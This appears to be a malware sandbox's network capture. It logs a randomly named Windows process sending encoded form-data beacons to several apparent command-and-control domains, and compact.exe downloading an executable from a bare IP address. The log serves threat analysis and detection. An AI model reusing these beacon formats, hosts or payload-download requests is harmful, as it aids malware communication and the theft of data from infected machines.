                                                                            Jun 19, 2024 22:39:33.405536890 CEST | 710 | OUT | POST /0a9p/ HTTP/1.1
                                                                            Host: www.shahaf3d.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.shahaf3d.com
                                                                            Referer: http://www.shahaf3d.com/0a9p/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=Y+MoCjqFkfVpwG4xOio5IePtb7UvoUswM1KYn67JPxvA5JEvtiHkXFmlnNcDk+QO0AmdhZnqKEEaA+yOgSK9VQ4B3c0PM17BCWktlEIkpj3N3LVqoQ/yrNdfzZkVNXx10oB8U2QWdaZ6fsm8Mplw+wNJYcxTIHqPZa1rAY3XUQnP8EJjIG2sMaj7febEKeimfY6rIpYk9DnhOxOXPKkdmxg=
                                                                            Jun 19, 2024 22:39:34.666969061 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.4.33
                                                                            x-litespeed-tag: afb_HTTP.404
                                                                            content-type: text/html; charset=UTF-8
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache; private
                                                                            x-litespeed-cache-control: no-cache
                                                                            transfer-encoding: chunked
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Wed, 19 Jun 2024 20:39:34 GMT
                                                                            server: LiteSpeed


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            11 | 192.168.2.4 | 49755 | 64.46.118.35 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:35.936759949 CEST | 10792 | OUT | POST /0a9p/ HTTP/1.1
                                                                            Host: www.shahaf3d.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.shahaf3d.com
                                                                            Referer: http://www.shahaf3d.com/0a9p/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6= [TRUNCATED]
                                                                            Jun 19, 2024 22:39:37.208005905 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.4.33
                                                                            x-litespeed-tag: afb_HTTP.404
                                                                            content-type: text/html; charset=UTF-8
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache; private
                                                                            x-litespeed-cache-control: no-cache
                                                                            transfer-encoding: chunked
                                                                            content-encoding: br
                                                                            vary: Accept-Encoding
                                                                            date: Wed, 19 Jun 2024 20:39:37 GMT
                                                                            server: LiteSpeed


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            12 | 192.168.2.4 | 49756 | 64.46.118.35 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:38.488833904 CEST | 431 | OUT | GET /0a9p/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=V8kIBUO99PR2h3hwNikpQa7QEoMXp00tAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SbRMe/fNWKGzhA25w4nUiqWWc/J5aoRnGifc= HTTP/1.1
                                                                            Host: www.shahaf3d.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:39:39.959783077 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.4.33
                                                                            content-type: text/html; charset=UTF-8
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache; private
                                                                            x-litespeed-cache-control: public,max-age=3600
                                                                            x-litespeed-tag: afb_HTTP.404,afb_404,afb_URL.bb612978f523fb6348e4e3107ed53975,afb_
                                                                            x-litespeed-cache: miss
                                                                            transfer-encoding: chunked
                                                                            date: Wed, 19 Jun 2024 20:39:39 GMT
                                                                            server: LiteSpeed


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            13 | 192.168.2.4 | 49757 | 13.228.81.39 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:39:45.830044985 CEST | 729 | OUT | POST /3h10/ HTTP/1.1
                                                                            Host: www.againbeautywhiteskin.asia
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.againbeautywhiteskin.asia
                                                                            Referer: http://www.againbeautywhiteskin.asia/3h10/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=wkxrU9nSBfOKOzEYmcMr44p00fhSgl3fPNSZHwADZdAtrZOCjiVRjr1U7HOAdQ5YOxKMR8bBXbFpdG96VbDtHhVMItQ0Oo73q+IlIWHZHTaIOO8dwPWe5zGBm8UGPJ8Y6zOPhj6k4e8SuxQdCcD3ZwDATr0hHshw+WEse/5ZDlQue1qMOoqmecdyYu/aiAk12A==
                                                                            Jun 19, 2024 22:39:46.797692060 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Wed, 19 Jun 2024 20:39:46 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49758 | 13.228.81.39 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
Timestamp | Bytes transferred | Direction | Data
Jun 19, 2024 22:39:48.363131046 CEST | 749 | OUT | POST /3h10/ HTTP/1.1
                                                                            Host: www.againbeautywhiteskin.asia
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.againbeautywhiteskin.asia
                                                                            Referer: http://www.againbeautywhiteskin.asia/3h10/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 19, 2024 22:39:49.305522919 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Wed, 19 Jun 2024 20:39:49 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49759 | 13.228.81.39 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
Timestamp | Bytes transferred | Direction | Data
Jun 19, 2024 22:39:50.963115931 CEST | 10831 | OUT | POST /3h10/ HTTP/1.1
                                                                            Host: www.againbeautywhiteskin.asia
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.againbeautywhiteskin.asia
                                                                            Referer: http://www.againbeautywhiteskin.asia/3h10/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 19, 2024 22:39:52.176877975 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Wed, 19 Jun 2024 20:39:52 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49760 | 13.228.81.39 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
Timestamp | Bytes transferred | Direction | Data
Jun 19, 2024 22:39:53.502044916 CEST | 444 | OUT | GET /3h10/?tF1tk6=9mZLXJL8GvO5ODxaoOomsqt4kv5XiFfxC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtHTdpL9gTGqilltwgGUv9YmP3AeMh48KIxzc=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.againbeautywhiteskin.asia
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Jun 19, 2024 22:39:54.473053932 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Wed, 19 Jun 2024 20:39:54 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
                                                                            Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://p
                                                                            Jun 19, 2024 22:39:54.473299026 CEST1236INData Raw: 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 6c 61 64 69 2d 73 65 63 74 69 6f 6e 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 61 64 69 2d 73 65 63 74 69 6f 6e
                                                                            Data Ascii: t:100%;overflow:hidden}.ladi-section{margin:0 auto;position:relative}.ladi-section .ladi-section-arrow-down{position:absolute;width:36px;height:30px;bottom:0;right:0;left:0;margin:auto;background:url(https://w.ladicdn.com/v2/source/ladi-icons.
                                                                            Jun 19, 2024 22:39:54.473330021 CEST1236INData Raw: 73 69 74 69 6f 6e 3a 2d 32 38 70 78 7d 2e 6c 61 64 69 2d 63 61 72 6f 75 73 65 6c 20 2e 6c 61 64 69 2d 63 61 72 6f 75 73 65 6c 2d 61 72 72 6f 77 2d 72 69 67 68 74 7b 72 69 67 68 74 3a 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69
                                                                            Data Ascii: sition:-28px}.ladi-carousel .ladi-carousel-arrow-right{right:5px;background-position:-52px}.ladi-gallery{position:absolute;width:100%;height:100%}.ladi-gallery .ladi-gallery-view{position:absolute;overflow:hidden}.ladi-gallery .ladi-gallery-vi
                                                                            Jun 19, 2024 22:39:54.473364115 CEST1236INData Raw: 67 61 6c 6c 65 72 79 2d 76 69 65 77 3e 2e 73 65 6c 65 63 74 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 20 2e 6c 61 64 69 2d 67 61 6c 6c 65 72 79 2d 76 69 65 77 3e 2e 73 65 6c 65 63 74 65 64 7b 6c 65
                                                                            Data Ascii: gallery-view>.selected{display:block}.ladi-gallery .ladi-gallery-view>.selected{left:0}.ladi-gallery .ladi-gallery-view>.next,.ladi-gallery .ladi-gallery-view>.prev{position:absolute;top:0;width:100%}.ladi-gallery .ladi-gallery-view>.next{left
                                                                            Jun 19, 2024 22:39:54.478180885 CEST1216INData Raw: 35 30 25 20 2d 20 31 38 70 78 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 2e 6c 61 64 69 63 64 6e 2e 63 6f 6d 2f 76 32 2f 73 6f 75 72 63 65 2f 6c 61 64 69 2d 69 63 6f 6e 73 2e 73 76 67 29 20 6e 6f 2d 72 65 70 65
                                                                            Data Ascii: 50% - 18px);background:url(https://w.ladicdn.com/v2/source/ladi-icons.svg) no-repeat;cursor:pointer;z-index:90000050}.ladi-gallery .ladi-gallery-view .ladi-gallery-view-arrow-left{left:5px;background-position:-28px}.ladi-gallery .ladi-gallery-


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            17 | 192.168.2.4 | 49761 | 162.0.213.94 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:40:07.849802017 CEST | 690 | OUT | POST /e20q/ HTTP/1.1
                                                                            Host: www.lenovest.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.lenovest.xyz
                                                                            Referer: http://www.lenovest.xyz/e20q/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=bNDCugX1nXGLSZuuLGiIehg/9Ws0zV3F/OkIbzQhTm4Ba8kOcrraVBmr0nGpIZO8MfHTZUj23Y13evJrdqWTa4rdVmpINdaFWLivRFKIDw7MlIWCQjkf4CSZamcbeapRl90JjB6YRghd5Nmuw8dB6CuFH8HCShX7Po72ASbQuyDG91TH4uftZ0o7fznqbx0b5A==
                                                                            Jun 19, 2024 22:40:08.470860004 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:40:08 GMT
                                                                            Server: Apache
                                                                            Content-Length: 16052
                                                                            Connection: close
                                                                            Content-Type: text/html


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            18 | 192.168.2.4 | 49762 | 162.0.213.94 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:40:10.387191057 CEST | 710 | OUT | POST /e20q/ HTTP/1.1
                                                                            Host: www.lenovest.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.lenovest.xyz
                                                                            Referer: http://www.lenovest.xyz/e20q/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=bNDCugX1nXGLDK2uMlaIZBg84Ws0613B/O4Ib298SQABbe8ONf3aYhmr7HGsH5OJMe7hZVP23Yh3erNrcZvFI4rlaGpKSNaFWLivRBiyDwjMi4mCQA8Q7CSGdmcbaapNl903jAmiRipd5JuuwtcX0CuHD8G3eBD2Co3nfDjFvGTS4zCdpf+6L0MIC0ueWyJSiFO4TNkFZmqIkWLMYqUSlzg=
                                                                            Jun 19, 2024 22:40:10.974095106 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:40:10 GMT
                                                                            Server: Apache
                                                                            Content-Length: 16052
                                                                            Connection: close
                                                                            Content-Type: text/html


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            19 | 192.168.2.4 | 49763 | 162.0.213.94 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:40:12.924845934 CEST | 10792 | OUT | POST /e20q/ HTTP/1.1
                                                                            Host: www.lenovest.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.lenovest.xyz
                                                                            Referer: http://www.lenovest.xyz/e20q/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:40:13.718149900 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:40:13 GMT
                                                                            Server: Apache
                                                                            Content-Length: 16052
                                                                            Connection: close
                                                                            Content-Type: text/html


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            20 | 192.168.2.4 | 49764 | 162.0.213.94 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:40:15.470191002 CEST | 431 | OUT | GET /e20q/?tF1tk6=WPritX3A9R+ySLDGPku/GD0rpC4O61Hw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRL6LWdHBkCM2rbaWuRFm/Az6wkZG2Vj0/zBQ=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.lenovest.xyz
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:40:16.099117041 CEST | 250 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 19 Jun 2024 20:40:15 GMT
                                                                            Server: Apache
                                                                            Vary: Accept-Encoding
                                                                            Content-Length: 76
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Ascii: UP34wHPFlx2nBKCCK3PfB2d/q2xXmCG8mZoLDi19Exs/ZNh/I6CyTBiU7gy2NpDEFdnedUuA7A==


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            21 | 192.168.2.4 | 49765 | 185.234.72.101 | 80 | 8036 | C:\Windows\SysWOW64\compact.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:40:17.162128925 CEST | 196 | OUT | GET /OdR8akYyHwr3ISR.exe HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Host: 185.234.72.101
                                                                            Connection: Keep-Alive
                                                                            Cache-Control: no-cache
                                                                            Jun 19, 2024 22:40:17.807693005 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 19 Jun 2024 20:40:17 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                            Last-Modified: Tue, 18 Jun 2024 06:38:34 GMT
                                                                            ETag: "a9e00-61b2454b3e108"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 695808
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-msdownload


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            22 | 192.168.2.4 | 49766 | 172.82.177.221 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:40:21.462055922 CEST | 684 | OUT | POST /2ha1/ HTTP/1.1
                                                                            Host: www.931951.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.931951.com
                                                                            Referer: http://www.931951.com/2ha1/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=m4CeyHIdc3Vj5Lx4FLDZ9X/bU4BPTGW1DMqT5n+KByURjm2mcRJw8OJCHZ3g3ybTK4u71AURg3bWKjzTGqVfLkL257RjvnYdd8ZfYZxyCE+2eCFphkH4I8JJtQ6fs+wwaDhSQezuz3M7FYsjxWmDZtJ3MTAjkLFHyi4cU5CEef21BAE7qwxhB3Orzq5xCX7Hcg==


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            23 | 192.168.2.4 | 49767 | 172.82.177.221 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:40:23.998194933 CEST | 704 | OUT | POST /2ha1/ HTTP/1.1
                                                                            Host: www.931951.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.931951.com
                                                                            Referer: http://www.931951.com/2ha1/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Ascii: tF1tk6=m4CeyHIdc3Vj4qB4JIrZ43/YIoBPcmW5DMmT5m7HCAwRgC6mdThw/OJCJ53l4SbaK4zY1AYRg3PWKm3TFd5YL0L4srRlrnYdd8ZfYZlUCE22ey1phBn/WsJGqQ6fmew0aDh0QcHUz107FZcjyHmcKNJxBzBq16Ul3hp8efThWuTRNmVh7BQ2T3qYutwFPUGOHsEVGegWk9n79TdR4IRH1P0=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            24 | 192.168.2.4 | 49768 | 172.82.177.221 | 80 | 5740 | C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jun 19, 2024 22:40:26.528857946 CEST | 10786 | OUT | POST /2ha1/ HTTP/1.1
                                                                            Host: www.931951.com
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 10303
                                                                            Origin: http://www.931951.com
                                                                            Referer: http://www.931951.com/2ha1/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
